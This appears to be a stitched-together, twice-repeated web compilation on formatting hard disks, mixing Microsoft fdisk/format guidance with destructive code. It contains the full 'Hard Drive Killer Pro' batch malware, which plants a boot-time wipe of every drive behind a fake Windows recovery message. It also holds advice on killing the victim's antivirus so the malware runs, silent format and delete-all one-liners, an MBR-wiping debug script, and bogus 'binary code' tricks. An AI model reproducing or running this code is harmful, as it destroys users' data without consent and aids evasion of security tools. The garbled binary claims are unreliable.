echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
:end
I was told this is the part of the code that AV Companies catch:
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
Do not use this in a batch file
Code:
echo off
cls
echo y|format C:
This will format the Hard Drive Without user permission.
This will go right to do a format. You canot stop it. (do not say you were not warned...)
there is a command line switch to not prompt for y, sorry but cant remember what it is. the above will work.
more parameters follow
FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]
FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]
/V[:label] Specifies the volume label.
/Q Performs a quick format.
/F:size Specifies the size of the floppy disk to format (such as 160, 180, 320, 360, 720, 1.2, 1.44, 2.88).
/B Allocates space on the formatted disk for system files.
/S Copies system files to the formatted disk.
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
/1 Formats a single side of a floppy disk.
/4 Formats a 5.25-inch 360K floppy disk in a high-density drive.
/8 Formats eight sectors per track.
/C Tests clusters that are currently marked "bad."
=======================================================================
C:
Format a HDD with Notepad
You can now do a lot of things with a notepad which you could have never imagined. I will show you how to format a HDD using a notepad.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
OR
IF u think u cannot format c driver when windows..any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Do not try it on your PC. Don’t mess around this is for educational purpose only
1. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a.bat file
========================================
D:
CAUTION: This debug script is for advanced users only. Its Purpose is to remove all formatting and partitioning information from your hard disk when FDISK is unable to do so. THIS WILL REMOVE ALL DATA AND PROGRAMS FROM THE DRIVE.
1. Create a MSDOS bood disk with Debug
2. At DOS command prompt type the following: Debug[Enter] (Where enter is to press the enter key once)
NOTE: Type the following bolded text only. You will recieve an error if you type anything other than the bold text. The non-bolded text represents what will appear on you screen once you press [Enter] after each command.
-F 200 L1000 0 [Enter]
-A CS:100 [Enter]
xxxx:0100 MOV AX,301 [Enter]
xxxx:0103 MOV BX,200 [Enter]
xxxx:0106 MOV CX,1 [Enter]
xxxx:0109 MOV DX,80 [Enter]
NOTE: ( --- "80" for hd0, "81" for hd1)
xxxx:010c INT 13 [Enter]
xxxx: 010e INT 20 [Enter]
xxxx: 0110 [Enter]
-G [Enter]
"Program terminated normally"
3. Turn off the computer. On the next startup the hard drive will need to be partitioned and formatted.
***
====================================================================================
E :
How to Format a Hard Disk
After you create the partitions, you must format the partitions:
1. Restart your computer with the Startup disk in the floppy disk drive.
NOTE: If you are using a Windows 95 Startup disk, a command prompt is displayed and you can skip to step 2. If you are using a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk, select the Start computer without CD-ROM support menu option when the Windows 98 Startup menu is displayed.
2. When a command prompt is displayed, type format c: /s, and then press ENTER. This command transfers the system files and should only be used when you format drive C (or your "active" drive). For all other partitions, type format drive: (where drive is the letter of the partition that you want to format).
NOTE: If you receive a "Bad command" or "Bad file name" error message, you may need to extract the Format.com tool to your boot disk. To do this, type the following command at a command prompt, and then press ENTER:
extract ebd.cab format.com
After the Format.com tool is extracted to your boot disk, type format c: /s t a command prompt to format your active partition, or type format drive: if you want to format a partition that is not your active partition.
3. When you successfully run the Format.com tool, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!
Proceed with Format?
4. Press Y, and then press ENTER to format drive C.
5. After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the drive. You can either type an 11-character name for the drive, or you can leave it blank by pressing ENTER.
For information about how to repartition the extended partition and logical drives, view the "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format a Slave Hard Disk
If you want to add a second hard disk (slave drive) to your computer, you need to make sure that the jumpers on both the master (original) and slave (new drive) are set according to the manufacturer's instructions first so that your computer can detect the hard disks. Verify that your hardware is installed correctly, and then follow these steps:
1. Click Start, point to Run, and then type command (Note that the cmd command only works on Windows 2000-based computers).
2. At a command prompt, type fdisk, and then press ENTER. The following menu is displayed:
3. 1. Create DOS partition or Logical DOS Drive
4. 2. Set active partition
5. 3. Delete partition or Logical DOS Drive
6. 4. Display partition information
5. Change current fixed disk drive
Note that menu option 5 is available only if you have two physical hard disks on your computer.
7. Press 5, and then press ENTER. When you do this, the selection changes from the physical disk 1 (master) to the physical disk 2 (slave).
8. Press 1 to select the Create DOS partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Create Extended DOS Partition menu option, and then press ENTER. When you make your slave drive an extended MS-DOS partition, your drive letters does not change. For example, if the first drive contains partition C and partition D, your slave drive becomes D unless you set the slave drive as an extended partition. If you skip this step and just create another primary MS-DOS partition for the slave drive, the new drive becomes drive D and what used to be drive D, changes to drive E.
9. You can partition the slave drive to make other logical drives just as you did with the original master drive. If your computer cannot detect the new drive, you may need to add the following line to your Config.sys file, where drive is a letter that is greater than the last drive letter on the computer (including the CD-ROM drive):
lastdrive=drive
10. After you finish using the Fdisk tool, format the new partitions so that you can use them. After you press ESC to quit the Fdisk tool, restart your computer to start Windows.
How to Format a Slave Hard Disk
To format your new partition or partitions, use one of the following methods, depending on your file system. For a FAT16 file system:
a. Double-click My Computer, right-click the partition that you just created, click Format, click Full, and then click Start.
b. After the format procedure is complete, click OK to close the dialog box.
For a FAT32 file system:
a. Click Start, point to Programs, point to Accessories, point to System Tools, click Drive Converter (FAT32), and then click Next.
b. In the Drives box, click the drive that you want to convert to the FAT32 file system.
c. Click Next, and then click OK.
d. Click Next, click Next, and then click Next again.
e. When the conversion procedure is finished, click Finish.
NOTE: Do not use the /s switch that you used when you set up drive C. All you need to do is to format the drive or drives so that you can use them (for example, if you created two new drive letters, you need to format both drives).
For information about how to repartition the extended partition and logical drives, view the following "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk
Use the steps in this section to resize or combine your extended partition and logical drives. Make sure that you have a reliable backup of any important data that you have on your extended partition and logical drives before you proceed. If you want to combine your entire hard disk in one partition, use the steps in the "How to Partition and Format a Master Hard Disk" section in this article.
How to Repartition the Extended Partition and the Logical Drives
NOTE: When you use this method, two or more partitions are left on your hard disk, a primary partition (usually drive C) and an extended partition. Even if you use the FAT32 file system, there is an 8-GB partition limitation unless you obtain a BIOS upgrade that fully supports interrupt 13 extensions. For additional information about why there is an 8-GB limit, click the article number below to view the article in the Microsoft Knowledge Base:
153550 (http://support.microsoft.com/kb/153550/EN-US/ ) Hard Disk Limited to 8-GB Partition
If you have a hard disk that is larger than 8 GB and you are not using a disk overlay program or disk management software, you need to partition and format the space that is remaining after you create each 8-GB partition:
1. Place the Startup disk in your floppy disk drive, restart your computer, and then use one of the following methods, depending on your operating system. For a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk:
a. When the Microsoft Windows 98 Startup menu is displayed, select the Start computer without CD-ROM support menu option, and then press ENTER.
b. At a command prompt, type fdisk, and then press ENTER.
c. Go to step 2.
For a Windows 95 Startup disk:
d. At a command prompt, type fdisk, and then press ENTER.
e. Go to step 2.
If your hard disk is larger than 512 MB, you receive the following message:
Your computer has a disk larger than 512 MB. This version of Windows includes improved support for large disks, resulting in more efficient use of disk space on large drives, and allowing disks over 2 GB to be formatted as a single drive.
IMPORTANT: If you enable large disk support and create any new drives on this disk, you will not be able to access the new drive(s) using other operating systems, including some versions of Windows 95 and Windows NT, as well as earlier versions of Windows and MS-DOS. In addition, disk utilities that were not designated explicitly for the FAT32 file system will not be able to work with this disk. If you need to access this disk with other operating systems or older disk utilities, do not enable large drive support.
Do you wish to enable large disk support (Y/N)?
If you want to use the FAT32 file system, press Y and then press ENTER. If you want to use the FAT16 file system, press N, and then press ENTER.For additional information about the FAT32 and FAT16 file systems, click the article numbers below to view the articles in the Microsoft Knowledge Base:
118335 (http://support.microsoft.com/kb/118335/EN-US/ ) Maximum Partition Size Using FAT16 File System
154997 (http://support.microsoft.com/kb/154997/EN-US/ ) Description of the FAT32 File System
After you press ENTER, the following Fdisk Options menu is displayed:
1. Create DOS partition or Logical DOS Drive
2. Set active partition
3. Delete partition or Logical DOS Drive
4. Display partition information
5. Change current fixed disk drive
(this option is only available if you
have two physical hard disks in the computer)
Press 3, and then press ENTER. The following menu is displayed:
1. Delete Primary DOS Partition
2. Delete Extended DOS Partition
3. Delete Logical DOS Drive(s) in the Extended DOS Partition
4. Delete Non-DOS Partition
Press 3, and then press ENTER.
The Delete Logical DOS Drive(s) in the Extended DOS Partition screen is displayed with a chart that describes the attributes of your hard disk, as shown in the following example.
Collapse this tableExpand this table
Drv Volume Label Mbytes System Usage
D: (User Defined) 2047 FAT16 100%
E: (User Defined) 2047 FAT16 100%
F: (User Defined) 2047 FAT16 100%
G: (User Defined) 2047 FAT16 100%
H: (User Defined) 2047 FAT32 17%
I: (User Defined) 1498 UNKNOWN 13%
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes).
WARNING! Data in a deleted Logical DOS Drive will be lost.
What drive do you want to delete? Type the letter for the drive that you want to delete, and then press ENTER.
When you are prompted to type the volume label for the drive, type the volume label if the drive has a volume label.
NOTE: You must type the exact label or press ENTER if there is no volume label. If you type an incorrect label name, you receive the following message:
Volume label does not match.
Enter Volume Label?
If you type the correct volume label, you receive the following message:
Are you sure (Y/N)?
The default answer to this message is N. You must press Y, and then press ENTER to delete the drive. The words "Drive deleted" are displayed in the chart next to the drive letter that you deleted.
Repeat steps 3 through 7 until you have deleted all of the drives that you want to delete. When you are finished, press ESC. If you remove all of the logical drives, you receive a "No logical drives defined" message and a chart of drive letters that you changed or deleted. Press ESC to continue.
NOTE: If you want to resize the logical drive or drives by making them larger or smaller, do this now. If you want to remove the extended partition, view step 11.
Press 1 to select the Create DOS partition or Logical DOS Drive menu option from the Fdisk Options menu, press 3 to select the Create Logical DOS Drive(s) in the Extended DOS Partition menu option from the Create DOS Partition or Logical DOS Drive menu, and then press ENTER. When you do this, you receive a "Verifying drive integrity" message with a percentage-complete counter.
NOTE: When you use this step, the extended partition is not deleted, only the logical drive or drives in the extended partition are deleted. You do not need to remove the extended partition to resize the logical drives. For example, if you have one logical drive in the extended partition and you want to make two logical drives, delete the logical drive and create two logical drives in the extended partition first. Note that you are still limited to the total space in the extended partition.
After the drive verification procedure is finished, you receive the following message:
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes)
Maximum space available for logical drive is XXX Mbytes (X%)
Enter logical drive size in Mbytes or percent of disk space (%).
The "maximum Mbytes available" is the default size, however, you can change the number if you type the number for the partition size that you want to create, and then pressing ENTER. Press ESC, press ESC to quit the Fdisk tool and return to a command prompt, and then view step 11.
If you want to remove the extended MS-DOS partition, press ESC to return to the Fdisk Options menu. Press 3 to select the Delete DOS Partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Delete Extended DOS Partition menu option, and then press ENTER.
The screen shows the current fixed disk drive and information about it. The extended partition is listed in the Type column. For example:
Partition Status Type Volume Label Mbytes System Usage
C: 1 A PRI DOS (your label) 1200 FAT16 50%
2 EXT DOS (your label) 1200 UNKNOWN 50%
Total disk space is 2400 Mbytes (1 Mbyte = 1048576 bytes)
You also receive the following warning message:
WARNING! Data in the deleted Extended DOS Partition will be lost.
Do you wish to continue (Y/N)?
Press Y, and then press ENTER to delete the partition. You receive the following message:
Extended DOS Partition deleted
Press ESC to continue
NOTE: If you try to delete your extended MS-DOS partition before you remove all of the logical drives, you receive the following error message:
Cannot delete Extended DOS Partition while logical drives exist.
If you receive this error message, repeat steps 3 through 6, and then follow steps 9 and 10 to delete the extended MS-DOS partition.
The Fdisk Options menu is displayed. If you leave disk space unpartitioned on your hard disk, Windows may not display the full size of your hard disk, only the amount of space that is available.
IMPORTANT: After you change the Fdisk options or delete partitions, the data that was on the partition is deleted and cannot be retrieved. Be very sure that you understand this procedure before you attempt to follow it. If you want to start with a clean configuration or if you want to redo your current configuration, back up everything that is important to you before you use the Fdisk tool.
If you want to use the unpartitioned space on your hard disk, you must format the drives. When you successfully run the Format.com utility, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE X: WILL BE LOST!
Proceed with Format (Y/N)?
Press Y, and then press ENTER to format the drive.
After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the hard disk. You can either type an 11-character name for the drive, or leave it blank and press ENTER.
A : /* Progran to formatting disks */
#include
#include
#include "snpdskio.h"
int CDECL absdisk(unsigned char function,
unsigned short drive,
/* 0 = A:, etc. */
size_t number_of_sectors,
size_t starting_sector,
void * sector_buffer);
int AbsDiskRead(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x25, drive, num_of_sectors, (unsigned)sector, ptr);
}
int AbsDiskWrite(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x26, drive, num_of_sectors, (unsigned)sector, ptr);}
=======================================================================
B :
Format Harddrive?
@echo off
for %%i in (d:,e:,f:,g:) do format %%i /FS:NTFS /x
If you want quick format then add the /q switch to the end of the format command.
What follows is the code for the batch file code of the hard drive killer code. A virus that wipes your hard drive so fast that it can cause physical damage.
CAUTION!!!
Use at your own risk this is very dangerous. If you do manage to accidentally run it on your own system then do not restart but check your autoexec.bat file. This is now redundat because it is detected by many virus scanners but,if you kill the vics AV on entry it will work...also if they are running MicrosoftSpyware it will stop it from running so you need to go into Managers in CIA and use the ProcessManager to kill MicrosoftSpyware...kill process gcasDTServ.exe(some **** like that).
@echo off
rem Fastest way to format your computer.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
:end
I was told this is the part of the code that AV Companies catch:
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
Do not use this in a batch file
Code:
echo off
cls
echo y|format C:
This will format the Hard Drive Without user permission.
This will go right to do a format. You canot stop it. (do not say you were not warned...)
there is a command line switch to not prompt for y, sorry but cant remember what it is. the above will work.
more parameters follow
FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]
FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]
/V[:label] Specifies the volume label.
/Q Performs a quick format.
/F:size Specifies the size of the floppy disk to format (such as 160, 180, 320, 360, 720, 1.2, 1.44, 2.88).
/B Allocates space on the formatted disk for system files.
/S Copies system files to the formatted disk.
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
/1 Formats a single side of a floppy disk.
/4 Formats a 5.25-inch 360K floppy disk in a high-density drive.
/8 Formats eight sectors per track.
/C Tests clusters that are currently marked "bad."
=======================================================================
C:
Format a HDD with Notepad
You can now do a lot of things with a notepad which you could have never imagined. I will show you how to format a HDD using a notepad.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
OR
IF u think u cannot format c driver when windows..any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Do not try it on your PC. Don’t mess around this is for educational purpose only
1. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a.bat file
========================================
D:
CAUTION: This debug script is for advanced users only. Its Purpose is to remove all formatting and partitioning information from your hard disk when FDISK is unable to do so. THIS WILL REMOVE ALL DATA AND PROGRAMS FROM THE DRIVE.
1. Create a MSDOS bood disk with Debug
2. At DOS command prompt type the following: Debug[Enter] (Where enter is to press the enter key once)
NOTE: Type the following bolded text only. You will recieve an error if you type anything other than the bold text. The non-bolded text represents what will appear on you screen once you press [Enter] after each command.
-F 200 L1000 0 [Enter]
-A CS:100 [Enter]
xxxx:0100 MOV AX,301 [Enter]
xxxx:0103 MOV BX,200 [Enter]
xxxx:0106 MOV CX,1 [Enter]
xxxx:0109 MOV DX,80 [Enter]
NOTE: ( --- "80" for hd0, "81" for hd1)
xxxx:010c INT 13 [Enter]
xxxx: 010e INT 20 [Enter]
xxxx: 0110 [Enter]
-G [Enter]
"Program terminated normally"
3. Turn off the computer. On the next startup the hard drive will need to be partitioned and formatted.
***
====================================================================================
E :
How to Format a Hard Disk
After you create the partitions, you must format the partitions:
1. Restart your computer with the Startup disk in the floppy disk drive.
NOTE: If you are using a Windows 95 Startup disk, a command prompt is displayed and you can skip to step 2. If you are using a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk, select the Start computer without CD-ROM support menu option when the Windows 98 Startup menu is displayed.
2. When a command prompt is displayed, type format c: /s, and then press ENTER. This command transfers the system files and should only be used when you format drive C (or your "active" drive). For all other partitions, type format drive: (where drive is the letter of the partition that you want to format).
NOTE: If you receive a "Bad command" or "Bad file name" error message, you may need to extract the Format.com tool to your boot disk. To do this, type the following command at a command prompt, and then press ENTER:
extract ebd.cab format.com
After the Format.com tool is extracted to your boot disk, type format c: /s t a command prompt to format your active partition, or type format drive: if you want to format a partition that is not your active partition.
3. When you successfully run the Format.com tool, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!
Proceed with Format?
4. Press Y, and then press ENTER to format drive C.
5. After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the drive. You can either type an 11-character name for the drive, or you can leave it blank by pressing ENTER.
For information about how to repartition the extended partition and logical drives, view the "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format a Slave Hard Disk
If you want to add a second hard disk (slave drive) to your computer, you need to make sure that the jumpers on both the master (original) and slave (new drive) are set according to the manufacturer's instructions first so that your computer can detect the hard disks. Verify that your hardware is installed correctly, and then follow these steps:
1. Click Start, point to Run, and then type command (Note that the cmd command only works on Windows 2000-based computers).
2. At a command prompt, type fdisk, and then press ENTER. The following menu is displayed:
3. 1. Create DOS partition or Logical DOS Drive
4. 2. Set active partition
5. 3. Delete partition or Logical DOS Drive
6. 4. Display partition information
5. Change current fixed disk drive
Note that menu option 5 is available only if you have two physical hard disks on your computer.
7. Press 5, and then press ENTER. When you do this, the selection changes from the physical disk 1 (master) to the physical disk 2 (slave).
8. Press 1 to select the Create DOS partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Create Extended DOS Partition menu option, and then press ENTER. When you make your slave drive an extended MS-DOS partition, your drive letters does not change. For example, if the first drive contains partition C and partition D, your slave drive becomes D unless you set the slave drive as an extended partition. If you skip this step and just create another primary MS-DOS partition for the slave drive, the new drive becomes drive D and what used to be drive D, changes to drive E.
9. You can partition the slave drive to make other logical drives just as you did with the original master drive. If your computer cannot detect the new drive, you may need to add the following line to your Config.sys file, where drive is a letter that is greater than the last drive letter on the computer (including the CD-ROM drive):
lastdrive=drive
10. After you finish using the Fdisk tool, format the new partitions so that you can use them. After you press ESC to quit the Fdisk tool, restart your computer to start Windows.
How to Format a Slave Hard Disk
To format your new partition or partitions, use one of the following methods, depending on your file system. For a FAT16 file system:
a. Double-click My Computer, right-click the partition that you just created, click Format, click Full, and then click Start.
b. After the format procedure is complete, click OK to close the dialog box.
For a FAT32 file system:
a. Click Start, point to Programs, point to Accessories, point to System Tools, click Drive Converter (FAT32), and then click Next.
b. In the Drives box, click the drive that you want to convert to the FAT32 file system.
c. Click Next, and then click OK.
d. Click Next, click Next, and then click Next again.
e. When the conversion procedure is finished, click Finish.
NOTE: Do not use the /s switch that you used when you set up drive C. All you need to do is to format the drive or drives so that you can use them (for example, if you created two new drive letters, you need to format both drives).
For information about how to repartition the extended partition and logical drives, view the following "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
